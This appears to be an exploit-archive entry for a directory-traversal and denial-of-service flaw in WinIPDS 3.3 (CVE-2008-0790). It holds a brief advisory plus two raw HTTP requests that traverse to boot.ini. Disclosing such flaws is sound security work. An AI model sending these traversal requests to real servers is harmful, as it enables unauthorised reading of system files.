WinIPDS 3.3 rev. G52-33-021 - Directory Traversal / Denial of Service

Author: Luigi Auriemma
type: remote
platform: windows
port: 
date_added: 2008-02-12  
date_updated: 2014-01-23  
verified: 1  
codes: CVE-2008-0790;OSVDB-41839  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 31163.txt  

source: https://www.securityfocus.com/bid/27757/info

WinIPDS is prone to a directory-traversal vulnerability and a denial-of-service vulnerability.

Exploiting these issues will allow attackers to gain to sensitive information or crash the affected application, denying further service to legitimate users.

These issues affect WinIPDS 3.3 rev. G52-33-021; prior versions may also be affected.

GET /../../../../../boot.ini HTTP/1.0
or
POST /..\../..\../..\boot.ini HTTP/1.0